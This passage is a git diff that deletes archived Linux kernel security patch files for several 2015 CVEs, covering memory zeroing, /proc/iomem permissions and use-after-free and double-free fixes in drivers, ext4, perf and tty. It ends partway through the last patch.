- kernel/resource.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/kernel/resource.c b/kernel/resource.c
-index a5a8086..91c35c3 100644
---- a/kernel/resource.c
-+++ b/kernel/resource.c
-@@ -153,7 +153,7 @@ static const struct file_operations proc_iomem_operations = {
- static int __init ioresources_init(void)
- {
- 	proc_create("ioports", 0, NULL, &proc_ioports_operations);
--	proc_create("iomem", 0, NULL, &proc_iomem_operations);
-+	proc_create("iomem", S_IRUSR, NULL, &proc_iomem_operations);
- 	return 0;
- }
- __initcall(ioresources_init);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8950/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8950/ANY/0001.patch
deleted file mode 100644
index 69f66afc..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8950/ANY/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From 6e2c437a2d0a85d90d3db85a7471f99764f7bbf8 Mon Sep 17 00:00:00 2001
-From: Marek Szyprowski <m.szyprowski@samsung.com>
-Date: Thu, 23 Apr 2015 12:46:16 +0100
-Subject: arm64: dma-mapping: always clear allocated buffers
-
-[ Upstream commit 6829e274a623187c24f7cfc0e3d35f25d087fcc5 ]
-
-Buffers allocated by dma_alloc_coherent() are always zeroed on Alpha,
-ARM (32bit), MIPS, PowerPC, x86/x86_64 and probably other architectures.
-It turned out that some drivers rely on this 'feature'. Allocated buffer
-might be also exposed to userspace with dma_mmap() call, so clearing it
-is desired from security point of view to avoid exposing random memory
-to userspace. This patch unifies dma_alloc_coherent() behavior on ARM64
-architecture with other implementations by unconditionally zeroing
-allocated buffer.
-
-CRs-Fixed: 1041735
-Change-Id: I74bf024e0f603ca8c0b05430dc2ee154d579cfb2
-Cc: <stable@vger.kernel.org> # v3.14+
-Signed-off-by: Marek Szyprowski <m.szyprowski@samsung.com>
-Signed-off-by: Will Deacon <will.deacon@arm.com>
-Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
-Git-commit: a142e9641dcbead2c8845c949ad518acac96ed28
-Git-repo: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
-[lmark@codeaurora.org: resolve merge conflicts]
-Signed-off-by: Liam Mark <lmark@codeaurora.org>
----
- arch/arm64/mm/dma-mapping.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/arch/arm64/mm/dma-mapping.c b/arch/arm64/mm/dma-mapping.c
-index 9b4716e..2678f6e 100644
---- a/arch/arm64/mm/dma-mapping.c
-+++ b/arch/arm64/mm/dma-mapping.c
-@@ -88,6 +88,7 @@ static void *__alloc_from_pool(size_t size, struct page **ret_page)
- 	if (pageno < pool->nr_pages) {
- 		bitmap_set(pool->bitmap, pageno, count);
- 		ptr = pool->vaddr + PAGE_SIZE * pageno;
-+		memset(ptr, 0, size);
- 		*ret_page = pool->pages[pageno];
- 	} else {
- 		pr_err_once("ERROR: %u KiB atomic DMA coherent pool is too small!\n"
-@@ -208,6 +209,7 @@ static void *arm64_swiotlb_alloc_coherent(struct device *dev, size_t size,
- 
- 		page = pfn_to_page(pfn);
- 		addr = page_address(page);
-+		memset(addr, 0, size);
- 
- 		if (dma_get_attr(DMA_ATTR_NO_KERNEL_MAPPING, attrs) ||
- 		    dma_get_attr(DMA_ATTR_STRONGLY_ORDERED, attrs)) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8951/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2015-8951/3.10/0001.patch
deleted file mode 100644
index 910b5c61..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8951/3.10/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From ccff36b07bfc49efc77b9f1b55ed2bf0900b1d5b Mon Sep 17 00:00:00 2001
-From: Vidyakumar Athota <vathota@codeaurora.org>
-Date: Wed, 16 Dec 2015 15:42:39 -0800
-Subject: ASoC: msm-lsm-client: free lsm client data in msm_lsm_close
-
-Currently lsm client data is deallocated when q6lsm_open() fails
-which can cause memory corruption if lsm client data is accessed
-after freed. Fix this issue by deallocating the client data only
-in msm_lsm_close().
-
-Change-Id: If048c26a0ffd8a346a28622183cbf2ba1e7e5ff3
-Signed-off-by: Vidyakumar Athota <vathota@codeaurora.org>
----
- include/sound/q6lsm.h                  |  1 +
- sound/soc/msm/qdsp6v2/msm-lsm-client.c | 10 +++++++---
- 2 files changed, 8 insertions(+), 3 deletions(-)
-
-diff --git a/include/sound/q6lsm.h b/include/sound/q6lsm.h
-index 6045b7f..d410a9b 100644
---- a/include/sound/q6lsm.h
-+++ b/include/sound/q6lsm.h
-@@ -71,6 +71,7 @@ struct lsm_client {
- 	uint16_t	connect_to_port;
- 	uint8_t		num_confidence_levels;
- 	uint8_t		*confidence_levels;
-+	bool		opened;
- 	bool		started;
- 	dma_addr_t	lsm_cal_phy_addr;
- 	uint32_t	lsm_cal_size;
-diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-index f0a164f..2337f91 100644
---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-@@ -747,10 +747,9 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: lsm open failed, %d\n",
- 				__func__, ret);
--			q6lsm_client_free(prtd->lsm_client);
--			kfree(prtd);
- 			return ret;
- 		}
-+		prtd->lsm_client->opened = true;
- 		dev_dbg(rtd->dev, "%s: Session_ID = %d, APP ID = %d\n",
- 			__func__,
- 			prtd->lsm_client->session,
-@@ -1697,6 +1696,7 @@ static int msm_lsm_open(struct snd_pcm_substream *substream)
- 		runtime->private_data = NULL;
- 		return -ENOMEM;
- 	}
-+	prtd->lsm_client->opened = false;
- 	return 0;
- }
- 
-@@ -1769,7 +1769,10 @@ static int msm_lsm_close(struct snd_pcm_substream *substream)
- 				 __func__);
- 	}
- 
--	q6lsm_close(prtd->lsm_client);
-+	if (prtd->lsm_client->opened) {
-+		q6lsm_close(prtd->lsm_client);
-+		prtd->lsm_client->opened = false;
-+	}
- 	q6lsm_client_free(prtd->lsm_client);
- 
- 	spin_lock_irqsave(&prtd->event_lock, flags);
-@@ -1777,6 +1780,7 @@ static int msm_lsm_close(struct snd_pcm_substream *substream)
- 	prtd->event_status = NULL;
- 	spin_unlock_irqrestore(&prtd->event_lock, flags);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8951/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2015-8951/3.18/0002.patch
deleted file mode 100644
index ea1052cc..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8951/3.18/0002.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 0aed2b7e739f7e528ffd8dac3c0c14deb82c9acf Mon Sep 17 00:00:00 2001
-From: Vidyakumar Athota <vathota@codeaurora.org>
-Date: Wed, 16 Dec 2015 15:42:39 -0800
-Subject: ASoC: msm-lsm-client: free lsm client data in msm_lsm_close
-
-Currently lsm client data is deallocated when q6lsm_open() fails
-which can cause memory corruption if lsm client data is accessed
-after freed. Fix this issue by deallocating the client data only
-in msm_lsm_close().
-
-Change-Id: If048c26a0ffd8a346a28622183cbf2ba1e7e5ff3
-Signed-off-by: Vidyakumar Athota <vathota@codeaurora.org>
----
- include/sound/q6lsm.h                  |  1 +
- sound/soc/msm/qdsp6v2/msm-lsm-client.c | 10 +++++++---
- 2 files changed, 8 insertions(+), 3 deletions(-)
-
-diff --git a/include/sound/q6lsm.h b/include/sound/q6lsm.h
-index 7cb7e15..fb848bc 100644
---- a/include/sound/q6lsm.h
-+++ b/include/sound/q6lsm.h
-@@ -71,6 +71,7 @@ struct lsm_client {
- 	uint16_t	connect_to_port;
- 	uint8_t		num_confidence_levels;
- 	uint8_t		*confidence_levels;
-+	bool		opened;
- 	bool		started;
- 	dma_addr_t	lsm_cal_phy_addr;
- 	uint32_t	lsm_cal_size;
-diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-index 37775da..bcd26f6 100644
---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-@@ -746,10 +746,9 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev,
- 				"%s: lsm open failed, %d\n",
- 				__func__, ret);
--			q6lsm_client_free(prtd->lsm_client);
--			kfree(prtd);
- 			return ret;
- 		}
-+		prtd->lsm_client->opened = true;
- 		dev_dbg(rtd->dev, "%s: Session_ID = %d, APP ID = %d\n",
- 			__func__,
- 			prtd->lsm_client->session,
-@@ -1690,6 +1689,7 @@ static int msm_lsm_open(struct snd_pcm_substream *substream)
- 		runtime->private_data = NULL;
- 		return -ENOMEM;
- 	}
-+	prtd->lsm_client->opened = false;
- 	return 0;
- }
- 
-@@ -1762,7 +1762,10 @@ static int msm_lsm_close(struct snd_pcm_substream *substream)
- 				 __func__);
- 	}
- 
--	q6lsm_close(prtd->lsm_client);
-+	if (prtd->lsm_client->opened) {
-+		q6lsm_close(prtd->lsm_client);
-+		prtd->lsm_client->opened = false;
-+	}
- 	q6lsm_client_free(prtd->lsm_client);
- 
- 	spin_lock_irqsave(&prtd->event_lock, flags);
-@@ -1770,6 +1773,7 @@ static int msm_lsm_close(struct snd_pcm_substream *substream)
- 	prtd->event_status = NULL;
- 	spin_unlock_irqrestore(&prtd->event_lock, flags);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8955/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8955/ANY/0001.patch
deleted file mode 100644
index dd63e79e..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8955/ANY/0001.patch
+++ /dev/null
@@ -1,111 +0,0 @@
-From 8fff105e13041e49b82f92eef034f363a6b1c071 Mon Sep 17 00:00:00 2001
-From: "Suzuki K. Poulose" <suzuki.poulose@arm.com>
-Date: Tue, 17 Mar 2015 18:14:59 +0000
-Subject: arm64: perf: reject groups spanning multiple HW PMUs
-
-The perf core implicitly rejects events spanning multiple HW PMUs, as in
-these cases the event->ctx will differ. However this validation is
-performed after pmu::event_init() is called in perf_init_event(), and
-thus pmu::event_init() may be called with a group leader from a
-different HW PMU.
-
-The ARM64 PMU driver does not take this fact into account, and when
-validating groups assumes that it can call to_arm_pmu(event->pmu) for
-any HW event. When the event in question is from another HW PMU this is
-wrong, and results in dereferencing garbage.
-
-This patch updates the ARM64 PMU driver to first test for and reject
-events from other PMUs, moving the to_arm_pmu and related logic after
-this test. Fixes a crash triggered by perf_fuzzer on Linux-4.0-rc2, with
-a CCI PMU present:
-
-Bad mode in Synchronous Abort handler detected, code 0x86000006 -- IABT (current EL)
-CPU: 0 PID: 1371 Comm: perf_fuzzer Not tainted 3.19.0+ #249
-Hardware name: V2F-1XV7 Cortex-A53x2 SMM (DT)
-task: ffffffc07c73a280 ti: ffffffc07b0a0000 task.ti: ffffffc07b0a0000
-PC is at 0x0
-LR is at validate_event+0x90/0xa8
-pc : [<0000000000000000>] lr : [<ffffffc000090228>] pstate: 00000145
-sp : ffffffc07b0a3ba0
-
-[<          (null)>]           (null)
-[<ffffffc0000907d8>] armpmu_event_init+0x174/0x3cc
-[<ffffffc00015d870>] perf_try_init_event+0x34/0x70
-[<ffffffc000164094>] perf_init_event+0xe0/0x10c
-[<ffffffc000164348>] perf_event_alloc+0x288/0x358
-[<ffffffc000164c5c>] SyS_perf_event_open+0x464/0x98c
-Code: bad PC value
-
-Also cleans up the code to use the arm_pmu only when we know
-that we are dealing with an arm pmu event.
-
-Cc: Will Deacon <will.deacon@arm.com>
-Acked-by: Mark Rutland <mark.rutland@arm.com>
-Acked-by: Peter Ziljstra (Intel) <peterz@infradead.org>
-Signed-off-by: Suzuki K. Poulose <suzuki.poulose@arm.com>
-Signed-off-by: Will Deacon <will.deacon@arm.com>
----
- arch/arm64/kernel/perf_event.c | 21 +++++++++++++++------
- 1 file changed, 15 insertions(+), 6 deletions(-)
-
-diff --git a/arch/arm64/kernel/perf_event.c b/arch/arm64/kernel/perf_event.c
-index 25a5308..68a7415 100644
---- a/arch/arm64/kernel/perf_event.c
-+++ b/arch/arm64/kernel/perf_event.c
-@@ -322,22 +322,31 @@ out:
- }
- 
- static int
--validate_event(struct pmu_hw_events *hw_events,
--	       struct perf_event *event)
-+validate_event(struct pmu *pmu, struct pmu_hw_events *hw_events,
-+				struct perf_event *event)
- {
--	struct arm_pmu *armpmu = to_arm_pmu(event->pmu);
-+	struct arm_pmu *armpmu;
- 	struct hw_perf_event fake_event = event->hw;
- 	struct pmu *leader_pmu = event->group_leader->pmu;
- 
- 	if (is_software_event(event))
- 		return 1;
- 
-+	/*
-+	 * Reject groups spanning multiple HW PMUs (e.g. CPU + CCI). The
-+	 * core perf code won't check that the pmu->ctx == leader->ctx
-+	 * until after pmu->event_init(event).
-+	 */
-+	if (event->pmu != pmu)
-+		return 0;
-+
- 	if (event->pmu != leader_pmu || event->state < PERF_EVENT_STATE_OFF)
- 		return 1;
- 
- 	if (event->state == PERF_EVENT_STATE_OFF && !event->attr.enable_on_exec)
- 		return 1;
- 
-+	armpmu = to_arm_pmu(event->pmu);
- 	return armpmu->get_event_idx(hw_events, &fake_event) >= 0;
- }
- 
-@@ -355,15 +364,15 @@ validate_group(struct perf_event *event)
- 	memset(fake_used_mask, 0, sizeof(fake_used_mask));
- 	fake_pmu.used_mask = fake_used_mask;
- 
--	if (!validate_event(&fake_pmu, leader))
-+	if (!validate_event(event->pmu, &fake_pmu, leader))
- 		return -EINVAL;
- 
- 	list_for_each_entry(sibling, &leader->sibling_list, group_entry) {
--		if (!validate_event(&fake_pmu, sibling))
-+		if (!validate_event(event->pmu, &fake_pmu, sibling))
- 			return -EINVAL;
- 	}
- 
--	if (!validate_event(&fake_pmu, event))
-+	if (!validate_event(event->pmu, &fake_pmu, event))
- 		return -EINVAL;
- 
- 	return 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8961/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8961/ANY/0001.patch
deleted file mode 100644
index 343a8b22..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8961/ANY/0001.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 6934da9238da947628be83635e365df41064b09b Mon Sep 17 00:00:00 2001
-From: Lukas Czerner <lczerner@redhat.com>
-Date: Sat, 17 Oct 2015 22:57:06 -0400
-Subject: ext4: fix potential use after free in __ext4_journal_stop
-
-There is a use-after-free possibility in __ext4_journal_stop() in the
-case that we free the handle in the first jbd2_journal_stop() because
-we're referencing handle->h_err afterwards. This was introduced in
-9705acd63b125dee8b15c705216d7186daea4625 and it is wrong. Fix it by
-storing the handle->h_err value beforehand and avoid referencing
-potentially freed handle.
-
-Fixes: 9705acd63b125dee8b15c705216d7186daea4625
-Signed-off-by: Lukas Czerner <lczerner@redhat.com>
-Reviewed-by: Andreas Dilger <adilger@dilger.ca>
-Cc: stable@vger.kernel.org
----
- fs/ext4/ext4_jbd2.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/fs/ext4/ext4_jbd2.c b/fs/ext4/ext4_jbd2.c
-index d418431..e770c1ee 100644
---- a/fs/ext4/ext4_jbd2.c
-+++ b/fs/ext4/ext4_jbd2.c
-@@ -88,13 +88,13 @@ int __ext4_journal_stop(const char *where, unsigned int line, handle_t *handle)
- 		return 0;
- 	}
- 
-+	err = handle->h_err;
- 	if (!handle->h_transaction) {
--		err = jbd2_journal_stop(handle);
--		return handle->h_err ? handle->h_err : err;
-+		rc = jbd2_journal_stop(handle);
-+		return err ? err : rc;
- 	}
- 
- 	sb = handle->h_transaction->t_journal->j_private;
--	err = handle->h_err;
- 	rc = jbd2_journal_stop(handle);
- 
- 	if (!err)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8962/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8962/ANY/0001.patch
deleted file mode 100644
index 105ef023..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8962/ANY/0001.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From f3951a3709ff50990bf3e188c27d346792103432 Mon Sep 17 00:00:00 2001
-From: Calvin Owens <calvinowens@fb.com>
-Date: Fri, 30 Oct 2015 16:57:00 -0700
-Subject: sg: Fix double-free when drives detach during SG_IO
-
-In sg_common_write(), we free the block request and return -ENODEV if
-the device is detached in the middle of the SG_IO ioctl().
-
-Unfortunately, sg_finish_rem_req() also tries to free srp->rq, so we
-end up freeing rq->cmd in the already free rq object, and then free
-the object itself out from under the current user.
-
-This ends up corrupting random memory via the list_head on the rq
-object. The most common crash trace I saw is this:
-
-  ------------[ cut here ]------------
-  kernel BUG at block/blk-core.c:1420!
-  Call Trace:
-  [<ffffffff81281eab>] blk_put_request+0x5b/0x80
-  [<ffffffffa0069e5b>] sg_finish_rem_req+0x6b/0x120 [sg]
-  [<ffffffffa006bcb9>] sg_common_write.isra.14+0x459/0x5a0 [sg]
-  [<ffffffff8125b328>] ? selinux_file_alloc_security+0x48/0x70
-  [<ffffffffa006bf95>] sg_new_write.isra.17+0x195/0x2d0 [sg]
-  [<ffffffffa006cef4>] sg_ioctl+0x644/0xdb0 [sg]
-  [<ffffffff81170f80>] do_vfs_ioctl+0x90/0x520
-  [<ffffffff81258967>] ? file_has_perm+0x97/0xb0
-  [<ffffffff811714a1>] SyS_ioctl+0x91/0xb0
-  [<ffffffff81602afb>] tracesys+0xdd/0xe2
-    RIP [<ffffffff81281e04>] __blk_put_request+0x154/0x1a0
-
-The solution is straightforward: just set srp->rq to NULL in the
-failure branch so that sg_finish_rem_req() doesn't attempt to re-free
-it.
-
-Additionally, since sg_rq_end_io() will never be called on the object
-when this happens, we need to free memory backing ->cmd if it isn't
-embedded in the object itself.
-
-KASAN was extremely helpful in finding the root cause of this bug.
-
-Signed-off-by: Calvin Owens <calvinowens@fb.com>
-Acked-by: Douglas Gilbert <dgilbert@interlog.com>
-Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
----
- drivers/scsi/sg.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index 9d7b7db..503ab8b 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -787,8 +787,14 @@ sg_common_write(Sg_fd * sfp, Sg_request * srp,
- 		return k;	/* probably out of space --> ENOMEM */
- 	}
- 	if (atomic_read(&sdp->detaching)) {
--		if (srp->bio)
-+		if (srp->bio) {
-+			if (srp->rq->cmd != srp->rq->__cmd)
-+				kfree(srp->rq->cmd);
-+
- 			blk_end_request_all(srp->rq, -EIO);
-+			srp->rq = NULL;
-+		}
-+
- 		sg_finish_rem_req(srp);
- 		return -ENODEV;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8963/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8963/ANY/0001.patch
deleted file mode 100644
index 3701d036..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8963/ANY/0001.patch
+++ /dev/null
@@ -1,96 +0,0 @@
-From 12ca6ad2e3a896256f086497a7c7406a547ee373 Mon Sep 17 00:00:00 2001
-From: Peter Zijlstra <peterz@infradead.org>
-Date: Tue, 15 Dec 2015 13:49:05 +0100
-Subject: perf: Fix race in swevent hash
-
-There's a race on CPU unplug where we free the swevent hash array
-while it can still have events on. This will result in a
-use-after-free which is BAD.
-
-Simply do not free the hash array on unplug. This leaves the thing
-around and no use-after-free takes place.
-
-When the last swevent dies, we do a for_each_possible_cpu() iteration
-anyway to clean these up, at which time we'll free it, so no leakage
-will occur.
-
-Reported-by: Sasha Levin <sasha.levin@oracle.com>
-Tested-by: Sasha Levin <sasha.levin@oracle.com>
-Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
-Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
-Cc: Frederic Weisbecker <fweisbec@gmail.com>
-Cc: Jiri Olsa <jolsa@redhat.com>
-Cc: Linus Torvalds <torvalds@linux-foundation.org>
-Cc: Peter Zijlstra <peterz@infradead.org>
-Cc: Stephane Eranian <eranian@google.com>
-Cc: Thomas Gleixner <tglx@linutronix.de>
-Cc: Vince Weaver <vincent.weaver@maine.edu>
-Signed-off-by: Ingo Molnar <mingo@kernel.org>
----
- kernel/events/core.c | 20 +-------------------
- 1 file changed, 1 insertion(+), 19 deletions(-)
-
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index fd7de04..0a791a2 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -6488,9 +6488,6 @@ struct swevent_htable {
- 
- 	/* Recursion avoidance in each contexts */
- 	int				recursion[PERF_NR_CONTEXTS];
--
--	/* Keeps track of cpu being initialized/exited */
--	bool				online;
- };
- 
- static DEFINE_PER_CPU(struct swevent_htable, swevent_htable);
-@@ -6748,14 +6745,8 @@ static int perf_swevent_add(struct perf_event *event, int flags)
- 	hwc->state = !(flags & PERF_EF_START);
- 
- 	head = find_swevent_head(swhash, event);
--	if (!head) {
--		/*
--		 * We can race with cpu hotplug code. Do not
--		 * WARN if the cpu just got unplugged.
--		 */
--		WARN_ON_ONCE(swhash->online);
-+	if (WARN_ON_ONCE(!head))
- 		return -EINVAL;
--	}
- 
- 	hlist_add_head_rcu(&event->hlist_entry, head);
- 	perf_event_update_userpage(event);
-@@ -6823,7 +6814,6 @@ static int swevent_hlist_get_cpu(struct perf_event *event, int cpu)
- 	int err = 0;
- 
- 	mutex_lock(&swhash->hlist_mutex);
--
- 	if (!swevent_hlist_deref(swhash) && cpu_online(cpu)) {
- 		struct swevent_hlist *hlist;
- 
-@@ -9286,7 +9276,6 @@ static void perf_event_init_cpu(int cpu)
- 	struct swevent_htable *swhash = &per_cpu(swevent_htable, cpu);
- 
- 	mutex_lock(&swhash->hlist_mutex);
--	swhash->online = true;
- 	if (swhash->hlist_refcount > 0) {
- 		struct swevent_hlist *hlist;
- 
-@@ -9328,14 +9317,7 @@ static void perf_event_exit_cpu_context(int cpu)
- 
- static void perf_event_exit_cpu(int cpu)
- {
--	struct swevent_htable *swhash = &per_cpu(swevent_htable, cpu);
--
- 	perf_event_exit_cpu_context(cpu);
--
--	mutex_lock(&swhash->hlist_mutex);
--	swhash->online = false;
--	swevent_hlist_release(swhash);
--	mutex_unlock(&swhash->hlist_mutex);
- }
- #else
- static inline void perf_event_exit_cpu(int cpu) { }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8964/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8964/ANY/0001.patch
deleted file mode 100644
index 3da3aa42..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8964/ANY/0001.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From dd42bf1197144ede075a9d4793123f7689e164bc Mon Sep 17 00:00:00 2001
-From: Peter Hurley <peter@hurleysoftware.com>
-Date: Fri, 27 Nov 2015 14:30:21 -0500
-Subject: tty: Prevent ldisc drivers from re-using stale tty fields
-
-Line discipline drivers may mistakenly misuse ldisc-related fields
-when initializing. For example, a failure to initialize tty->receive_room
-in the N_GIGASET_M101 line discipline was recently found and fixed [1].
-Now, the N_X25 line discipline has been discovered accessing the previous
-line discipline's already-freed private data [2].
-
-Harden the ldisc interface against misuse by initializing revelant
-tty fields before instancing the new line discipline.
-
-[1]
-    commit fd98e9419d8d622a4de91f76b306af6aa627aa9c
-    Author: Tilman Schmidt <tilman@imap.cc>
-    Date:   Tue Jul 14 00:37:13 2015 +0200
-
-    isdn/gigaset: reset tty->receive_room when attaching ser_gigaset
-
-[2] Report from Sasha Levin <sasha.levin@oracle.com>
-    [  634.336761] ==================================================================
-    [  634.338226] BUG: KASAN: use-after-free in x25_asy_open_tty+0x13d/0x490 at addr ffff8800a743efd0
-    [  634.339558] Read of size 4 by task syzkaller_execu/8981
-    [  634.340359] =============================================================================
-    [  634.341598] BUG kmalloc-512 (Not tainted): kasan: bad access detected
-    ...
-    [  634.405018] Call Trace:
-    [  634.405277] dump_stack (lib/dump_stack.c:52)
-    [  634.405775] print_trailer (mm/slub.c:655)
-    [  634.406361] object_err (mm/slub.c:662)
-    [  634.406824] kasan_report_error (mm/kasan/report.c:138 mm/kasan/report.c:236)
-    [  634.409581] __asan_report_load4_noabort (mm/kasan/report.c:279)
-    [  634.411355] x25_asy_open_tty (drivers/net/wan/x25_asy.c:559 (discriminator 1))
-    [  634.413997] tty_ldisc_open.isra.2 (drivers/tty/tty_ldisc.c:447)
-    [  634.414549] tty_set_ldisc (drivers/tty/tty_ldisc.c:567)
-    [  634.415057] tty_ioctl (drivers/tty/tty_io.c:2646 drivers/tty/tty_io.c:2879)
-    [  634.423524] do_vfs_ioctl (fs/ioctl.c:43 fs/ioctl.c:607)
-    [  634.427491] SyS_ioctl (fs/ioctl.c:622 fs/ioctl.c:613)
-    [  634.427945] entry_SYSCALL_64_fastpath (arch/x86/entry/entry_64.S:188)
-
-Cc: Tilman Schmidt <tilman@imap.cc>
-Cc: Sasha Levin <sasha.levin@oracle.com>
-Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/tty/tty_ldisc.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/tty/tty_ldisc.c b/drivers/tty/tty_ldisc.c
-index 9ec1250..a054d03 100644
---- a/drivers/tty/tty_ldisc.c
-+++ b/drivers/tty/tty_ldisc.c
-@@ -417,6 +417,10 @@ EXPORT_SYMBOL_GPL(tty_ldisc_flush);
-  *	they are not on hot paths so a little discipline won't do
-  *	any harm.
-  *
-+ *	The line discipline-related tty_struct fields are reset to
-+ *	prevent the ldisc driver from re-using stale information for
-+ *	the new ldisc instance.
-+ *
-  *	Locking: takes termios_rwsem
-  */
- 
-@@ -425,6 +429,9 @@ static void tty_set_termios_ldisc(struct tty_struct *tty, int num)
- 	down_write(&tty->termios_rwsem);
- 	tty->termios.c_line = num;
- 	up_write(&tty->termios_rwsem);
-+
-+	tty->disc_data = NULL;
-+	tty->receive_room = 0;
- }
- 
- /**
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8966/3.15+/0001.patch b/Patches/Linux_CVEs/CVE-2015-8966/3.15+/0001.patch
deleted file mode 100644
index 6019371a..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8966/3.15+/0001.patch
+++ /dev/null
@@ -1,112 +0,0 @@
-From 76cc404bfdc0d419c720de4daaf2584542734f42 Mon Sep 17 00:00:00 2001
-From: Al Viro <viro@zeniv.linux.org.uk>
-Date: Mon, 28 Dec 2015 20:47:08 -0500
-Subject: [PATCH] arm: fix handling of F_OFD_... in oabi_fcntl64()
-
-Cc: stable@vger.kernel.org # 3.15+
-Reviewed-by: Jeff Layton <jeff.layton@primarydata.com>
-Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
----
- arch/arm/kernel/sys_oabi-compat.c | 73 ++++++++++++++++++++-------------------
- 1 file changed, 37 insertions(+), 36 deletions(-)
-
-diff --git a/arch/arm/kernel/sys_oabi-compat.c b/arch/arm/kernel/sys_oabi-compat.c
-index b83f3b7..087acb5 100644
---- a/arch/arm/kernel/sys_oabi-compat.c
-+++ b/arch/arm/kernel/sys_oabi-compat.c
-@@ -193,15 +193,44 @@ struct oabi_flock64 {
- 	pid_t	l_pid;
- } __attribute__ ((packed,aligned(4)));
- 
--asmlinkage long sys_oabi_fcntl64(unsigned int fd, unsigned int cmd,
-+static long do_locks(unsigned int fd, unsigned int cmd,
- 				 unsigned long arg)
- {
--	struct oabi_flock64 user;
- 	struct flock64 kernel;
--	mm_segment_t fs = USER_DS; /* initialized to kill a warning */
--	unsigned long local_arg = arg;
--	int ret;
-+	struct oabi_flock64 user;
-+	mm_segment_t fs;
-+	long ret;
-+
-+	if (copy_from_user(&user, (struct oabi_flock64 __user *)arg,
-+			   sizeof(user)))
-+		return -EFAULT;
-+	kernel.l_type	= user.l_type;
-+	kernel.l_whence	= user.l_whence;
-+	kernel.l_start	= user.l_start;
-+	kernel.l_len	= user.l_len;
-+	kernel.l_pid	= user.l_pid;
-+
-+	fs = get_fs();
-+	set_fs(KERNEL_DS);
-+	ret = sys_fcntl64(fd, cmd, (unsigned long)&kernel);
-+	set_fs(fs);
-+
-+	if (!ret && (cmd == F_GETLK64 || cmd == F_OFD_GETLK)) {
-+		user.l_type	= kernel.l_type;
-+		user.l_whence	= kernel.l_whence;
-+		user.l_start	= kernel.l_start;
-+		user.l_len	= kernel.l_len;
-+		user.l_pid	= kernel.l_pid;
-+		if (copy_to_user((struct oabi_flock64 __user *)arg,
-+				 &user, sizeof(user)))
-+			ret = -EFAULT;
-+	}
-+	return ret;
-+}
- 
-+asmlinkage long sys_oabi_fcntl64(unsigned int fd, unsigned int cmd,
-+				 unsigned long arg)
-+{
- 	switch (cmd) {
- 	case F_OFD_GETLK:
- 	case F_OFD_SETLK:
-@@ -209,39 +238,11 @@ asmlinkage long sys_oabi_fcntl64(unsigned int fd, unsigned int cmd,
- 	case F_GETLK64:
- 	case F_SETLK64:
- 	case F_SETLKW64:
--		if (copy_from_user(&user, (struct oabi_flock64 __user *)arg,
